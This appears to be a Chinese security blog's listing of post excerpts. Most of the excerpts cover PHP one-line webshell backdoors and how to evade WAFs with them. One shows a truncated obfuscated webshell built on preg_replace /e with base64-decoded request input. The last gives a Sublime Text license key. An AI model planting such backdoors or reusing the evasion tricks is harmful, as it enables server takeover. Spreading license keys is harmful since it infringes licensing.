网络运维

PHP实现字符编码互转[ANSI、Unicode、Unicode big endian、UTF-8、UTF-8+Bom]

最近在做工具的时候遇到读取两个文件编码不一致的情况,但实际情况并不是用iconv转换就可以的那么简单,因为其中一个编码是ANSI,另一个是Unicode big endian,这时候用函数mb_detect_encoding 都识别不了编码,更别想用几个函数就能简单转换了。 不过google到了一个不错的php类,引入即可。  <?php /…继续阅读 »
渗透教程

浅析一句话后门中eval与assert执行条件与原理

eval与assert都算是元老级一句话后门函数,其实很多情形下代码的执行还是需要依靠eval去执行,只是前锋路转了而已。 eval与assert函数的用法大家可以自行百度。 eval与assert区别 eval函数中参数是字符,如: eval('echo 1;'); assert函数中参数为表达式 (或者为函数),如: assert(phpinfo()) assert(eval('ec…继续阅读 »
渗透教程

php一句话后门过狗姿势万千之后门构造与隐藏【二】

声明: 本文由博主首发于:阿里先知 https://xianzhi.aliyun.com/forum/read/441.html 如需要转载,请先联系先知技术社区授权;未经授权请勿转载。 上一篇:php一句话后门过狗姿势万千之理论篇【一】 第二章节主要带给大家一些后门构造思路,与安全狗文件特征检测的机制。 另外强调一下,这篇文章需…继续阅读 »
渗透教程

php一句话后门过狗姿势万千之传输层加工【三】

声明: 本文由博主首发于:阿里先知 https://xianzhi.aliyun.com/forum/read/442.html 如需要转载,请先联系先知技术社区授权;未经授权请勿转载。 先知技术社区投稿邮箱:Aliyun_xianzhi#service.alibaba.com   既然木马已就绪,那么想要利用木马,必然有一个数据传输的过程,数据提交是必须的,数据返回…继续阅读 »
渗透教程

php一句话后门过狗姿势万千之理论篇【一】

声明: 本文由博主首发于:阿里先知 https://xianzhi.aliyun.com/forum/read/441.html 如需要转载,请先联系先知技术社区授权;未经授权请勿转载。 写在前面: 过狗相关的资料网上也是有很多,所以在我接下来的文章中,可能观点或者举例可能会与网上部分雷同,或者表述不够全面。 但是我只能说,我…继续阅读 »
渗透工具 渗透教程

php一句话后门过5大WAF无压力[安全狗+360网站卫士+护卫神+D盾]

最近研究过狗一句话有点走火入魔,目前研究了几个版本的一句话,效果都还不错。 授之于鱼不如授之以渔,过几天准备从理论层,代码层,传输层写个过狗连载教程。 目前我使用的是cknife软件,类似于菜刀的开源软件,虽然还有不少bug,但高度自由修改,不用担心后门。我之所以没有用菜刀,…继续阅读 »
渗透教程

php一句话后门的几种变形分析[preg_replace函数]

今天偶然在土司看到一篇关于php后门的问题,让我联想到以前遇到过的一个一句话,共同点都是利用preg_replace中/e 修正符使replacement 参数当作 PHP 代码来执行。 先来看下原版代码 <?php $Base = "base6"."4"."_decod"."e"; $_clasc = $Base($_REQUEST['_exit']); $arr = array($Base($_POST['mcontent']) => '|.*|e',); @array_walk($arr, $_cla…继续阅读 »
互联网

sublime text 3 3103 完美激活与汉化插件安装

sublime text 3是一个非常棒的编辑器,非常适合于程序猿写代码,好用之处自行百度。 这个编辑器激活与汉化的教程网上的方法五花八样,这里给大家总结一个可用且简单的方法,其实也就是官网的说明。 sublime text 3 3103 激活码 —– BEGIN LICENSE —–Nicolas HennionSingle User LicenseEA7E-8660758A01AA83 1D668D24 4484A…继续阅读 »